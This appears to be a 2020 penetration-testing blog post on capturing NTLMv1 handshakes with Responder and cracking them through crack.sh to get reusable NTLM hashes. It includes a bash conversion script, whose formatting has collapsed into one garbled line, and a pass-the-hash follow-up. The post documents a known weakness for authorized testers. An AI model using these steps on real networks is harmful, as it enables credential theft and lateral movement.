August 15, 2020
Cracking NTLMv1 Handshakes with Crack.sh
Read on if you’d like to learn how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. Publicized since 2013, this technique is not often leveraged by testers.
Running Responder.py is one of the first tasks performed by most pentesters on internal penetration tests. This tool will spoof Multicast name resolution queries and give the pentester NTLMv1 and NTLMv2 handshakes. Usually the next step is to attempt to crack those handshakes, at a minimum running them against a wordlist such as crackstation.
A NTLMv1 handshake, however, offers another usually ignored cracking option that is guaranteed to give the tester the NTLM hash. The NTLM hash can be used as a password equivalent in a windows environment, unlike the NTLMv1 handshake.
Required Reading
MS-CHAPv2 handshakes can be broken into two rounds of 56 bit DES (and a third round using only 2bytes of the keyspace), which Moxie Demonstrated could be cracked by modern FPGAS (https://www.youtube.com/watch?v=sIidzPntdCM).
NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness (https://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html).
How do we exploit this?
Use the crack.sh site to extract the NTLM hash from any MSCHAP or NTLMv1 handshake for $20. You need to convert it to a token, rather than display in Responder directly because the site doesn’t take the challenge/response.
Use the script below to convert the Responder output to a token that will be accepted by crack.sh.
#!/bin/bash if [ $# -lt 1 ] then echo “Usage: ntlm-chapcrack.sh <hash_file> <hash_file2> …” exit 1 fi for i in $@; dofor hash in $( cat $i )do user=$(echo $hash | cut -f1 -d:) domain=$(echo $hash | cut -f3 -d:) lmresp=$(echo $hash | cut -f4 -d:) ntresp=$(echo $hash | cut -f5 -d:) srvchallenge=$(echo $hash | cut -f6 -d:) # Secret sauce: https://lists.samba.org/archive/samba-technical/2003-July/030974.html if [ ${lmresp:16:32} == “00000000000000000000000000000000” ] then clientchallenge=${lmresp:0:16} combinedchallenge=$srvchallenge$clientchallenge srvchallenge=$( echo $combinedchallenge | xxd -r -p| md5sum -b | cut -c1-16) fi echo echo “user:$user” echo “domain:$domain” echo “lmresponse:$lmresp” echo “ntresp:$ntresp” echo “challenge:$srvchallenge” chapcrack=$(locate chapcrack.py | head -1) if [ -e “$chapcrack” ] then $chapcrack radius -R $ntresp -C $srvchallenge else echo “chapcrack.py radius -R $ntresp -C $srvchallenge” fidonedone |
Upload this token to crack.sh, give them 20 dollars, and wait for your NTLM hash.
Another Hash?
Yes, NTLM hashes are password equivalents in a Windows environment. To leverage your newly acquired NTLM hash, use a tool like wmi-pth.